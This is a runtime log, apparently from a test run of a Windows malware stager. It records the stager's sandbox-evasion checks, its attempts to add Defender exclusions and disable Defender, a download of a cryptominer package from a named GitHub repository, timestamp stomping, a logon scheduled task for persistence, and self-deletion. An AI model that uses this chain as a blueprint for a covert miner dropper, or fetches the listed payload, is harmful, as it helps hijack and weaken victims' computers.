============================================================
====================== STAGER STARTED ======================
============================================================

2026-07-13 15:17:41,098|INFO|[MAIN] start, PID=20388
2026-07-13 15:17:41,098|INFO|[MAIN] woke up, args=['C:\\Users\\hotlo\\OneDrive\\Desktop\\zs.py']
2026-07-13 15:17:41,098|INFO|[EXCLUSION] adding script to Defender exclusions
2026-07-13 15:17:41,100|ERROR|[EXCLUSION_REG] failed to set exclusion: [WinError 5] Access is denied
2026-07-13 15:17:43,034|INFO|[EXCLUSION] done
2026-07-13 15:17:43,034|INFO|[MAIN] waiting 60 seconds before environment checks...
2026-07-13 15:18:52,035|INFO|[RAM_CHECK] start
2026-07-13 15:18:52,044|DEBUG|[RAM_CHECK] total=7.72 GB
2026-07-13 15:18:52,044|INFO|[RAM_CHECK] pass
2026-07-13 15:18:52,044|INFO|[USER_CHECK] start
2026-07-13 15:18:52,048|DEBUG|[USER_CHECK] username=hotlo
2026-07-13 15:18:52,049|INFO|[USER_CHECK] pass
2026-07-13 15:18:52,049|INFO|[PROC_CHECK] start
2026-07-13 15:18:52,373|INFO|[PROC_CHECK] pass
2026-07-13 15:18:52,373|INFO|[SW_CHECK] start
2026-07-13 15:18:52,375|CRITICAL|[SW_CHECK] Tool: resource hacker version 5.2.8
2026-07-13 15:18:52,375|WARNING|TESTING: Would have exited – Tool: resource hacker version 5.2.8
2026-07-13 15:18:52,376|DEBUG|[SW_CHECK] total keys enumerated: 43
2026-07-13 15:18:52,376|INFO|[SW_CHECK] pass
2026-07-13 15:18:52,376|INFO|[GEO_CHECK] start
2026-07-13 15:18:52,376|DEBUG|[GEO_CHECK] GeoID=39
2026-07-13 15:18:52,376|INFO|[GEO_CHECK] pass via GeoID
2026-07-13 15:18:52,376|INFO|[TZ_CHECK] start
2026-07-13 15:18:52,376|DEBUG|[TZ_CHECK] timezone: Eastern Standard Time
2026-07-13 15:18:52,376|INFO|[TZ_CHECK] pass
2026-07-13 15:18:52,377|INFO|[PS_CHECK] start
2026-07-13 15:18:52,377|INFO|[PS_CHECK] no history file
2026-07-13 15:18:52,377|INFO|[HISTORY_CHECK] start
2026-07-13 15:18:52,416|DEBUG|[HISTORY_CHECK] total=12241
2026-07-13 15:18:52,416|INFO|[HISTORY_CHECK] end
2026-07-13 15:18:52,417|INFO|[DISK_CHECK] start
2026-07-13 15:18:52,417|DEBUG|[DISK_CHECK] total=135.90 GB
2026-07-13 15:18:52,417|INFO|[DISK_CHECK] pass
2026-07-13 15:18:52,417|INFO|[SCREEN_CHECK] start
2026-07-13 15:18:52,417|DEBUG|[SCREEN_CHECK] res=1280x720
2026-07-13 15:18:52,417|INFO|[SCREEN_CHECK] pass
2026-07-13 15:18:52,417|INFO|[CPU_CHECK] start
2026-07-13 15:18:52,418|DEBUG|[CPU_CHECK] cores=12
2026-07-13 15:18:52,418|INFO|[CPU_CHECK] pass
2026-07-13 15:18:52,418|INFO|[SANDBOX_DLL_CHECK] start
2026-07-13 15:18:52,418|INFO|[SANDBOX_DLL_CHECK] pass
2026-07-13 15:18:52,418|INFO|[MAC_CHECK] start
2026-07-13 15:18:53,221|INFO|[MAC_CHECK] pass
2026-07-13 15:18:53,221|INFO|[MOUSE_CHECK] start
2026-07-13 15:18:56,223|CRITICAL|[MOUSE_CHECK] no mouse movement
2026-07-13 15:18:56,224|WARNING|TESTING: Would have exited – no mouse movement
2026-07-13 15:18:56,228|INFO|[MOUSE_CHECK] pass
2026-07-13 15:18:56,228|INFO|[PROC_COUNT_CHECK] start
2026-07-13 15:18:56,484|DEBUG|[PROC_COUNT_CHECK] count=241
2026-07-13 15:18:56,485|INFO|[PROC_COUNT_CHECK] pass
2026-07-13 15:18:56,485|INFO|[SANDBOX_FILE_CHECK] start
2026-07-13 15:18:56,486|INFO|[SANDBOX_FILE_CHECK] pass
2026-07-13 15:18:56,486|INFO|[UPTIME_CHECK] start
2026-07-13 15:18:56,532|DEBUG|[UPTIME_CHECK] uptime minutes: 1367.9
2026-07-13 15:18:56,533|INFO|[UPTIME_CHECK] pass
2026-07-13 15:18:56,533|INFO|[DEBUGGER_CHECK] start
2026-07-13 15:18:56,533|INFO|[DEBUGGER_CHECK] pass
2026-07-13 15:18:56,533|INFO|[MAIN] all checks passed – environment legitimate
2026-07-13 15:18:56,534|INFO|[DEFENDER_DISABLE] start
2026-07-13 15:19:06,893|INFO|[DEFENDER_DISABLE] done
2026-07-13 15:19:06,893|INFO|[WIN_UPDATE_DISABLE] start
2026-07-13 15:19:06,894|INFO|[WIN_UPDATE_DISABLE] already disabled via policy
2026-07-13 15:19:06,984|INFO|[DOWNLOAD] start
2026-07-13 15:19:07,003|DEBUG|[DOWNLOAD] jitter sleep 10s before download
2026-07-13 15:19:17,008|DEBUG|[DOWNLOAD] Downloading repo from https://github.com/kryontobad/nexusdesgin/archive/refs/heads/main.zip
2026-07-13 15:19:18,669|INFO|[DOWNLOAD] Download complete
2026-07-13 15:19:18,670|DEBUG|[DOWNLOAD] Extracting repository...
2026-07-13 15:19:18,731|DEBUG|[DOWNLOAD] Repository root: C:\Users\hotlo\AppData\Local\Temp\tmp_avucfcq\repo\nexusdesgin-main
2026-07-13 15:19:18,731|DEBUG|[DOWNLOAD] Searching for folder containing ['windows', 'security', 'dlls']
2026-07-13 15:19:18,733|INFO|[DOWNLOAD] Found folder: C:\Users\hotlo\AppData\Local\Temp\tmp_avucfcq\repo\nexusdesgin-main\windows security dlls
2026-07-13 15:19:18,734|INFO|[EXCLUSION] adding folder C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z to Defender exclusions
2026-07-13 15:19:18,735|ERROR|[EXCLUSION_REG] failed to set exclusion: [WinError 5] Access is denied
2026-07-13 15:19:20,143|INFO|[EXCLUSION] folder C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z added
2026-07-13 15:19:20,144|DEBUG|[DOWNLOAD] Copying target folder to directory...
2026-07-13 15:19:20,147|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\benchmark_10M.cmd
2026-07-13 15:19:20,149|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\benchmark_1M.cmd
2026-07-13 15:19:20,150|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\config.json
2026-07-13 15:19:20,152|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\pool_mine_example.cmd
2026-07-13 15:19:20,153|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\rtm_ghostrider_example.cmd
2026-07-13 15:19:20,154|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\SHA256SUMS
2026-07-13 15:19:20,155|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\solo_mine_example.cmd
2026-07-13 15:19:20,156|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\start.cmd
2026-07-13 15:19:20,160|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\who my pie.exe
2026-07-13 15:19:20,160|INFO|[DOWNLOAD] Folder copied to location
2026-07-13 15:19:20,160|INFO|[NAMEZ_DOWNLOAD] Searching for namez.py in repo
2026-07-13 15:19:20,161|INFO|[EXCLUSION] adding folder C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\namez.py to Defender exclusions
2026-07-13 15:19:20,162|ERROR|[EXCLUSION_REG] failed to set exclusion: [WinError 5] Access is denied
2026-07-13 15:19:21,028|INFO|[EXCLUSION] folder C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\namez.py added
2026-07-13 15:19:21,029|INFO|[NAMEZ_DOWNLOAD] saved to C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\namez.py
2026-07-13 15:19:21,029|DEBUG|[STOMP] timestamps set for C:\Users\hotlo\AppData\Local\Microsoft\Caches\D1X5htRrUtYC6Gu3z\namez.py
2026-07-13 15:19:21,029|INFO|[DOWNLOAD] preparation complete
2026-07-13 15:19:21,424|CRITICAL|[MARKER] file is not a valid PE, skipping lock file
2026-07-13 15:19:21,424|WARNING|[MARKER] miner exe not found in dropped folder, deployer will have to search
2026-07-13 15:19:21,425|INFO|[NAMEZ_PERSISTENCE] creating logon scheduled task for namez.py
2026-07-13 15:19:21,507|INFO|[NAMEZ_PERSISTENCE] logon task created
2026-07-13 15:19:21,508|INFO|[NAMEZ] Starting namez.py
2026-07-13 15:19:21,572|INFO|[LOADER] initiating self-deletion

=== Child finished. Press Enter to exit...
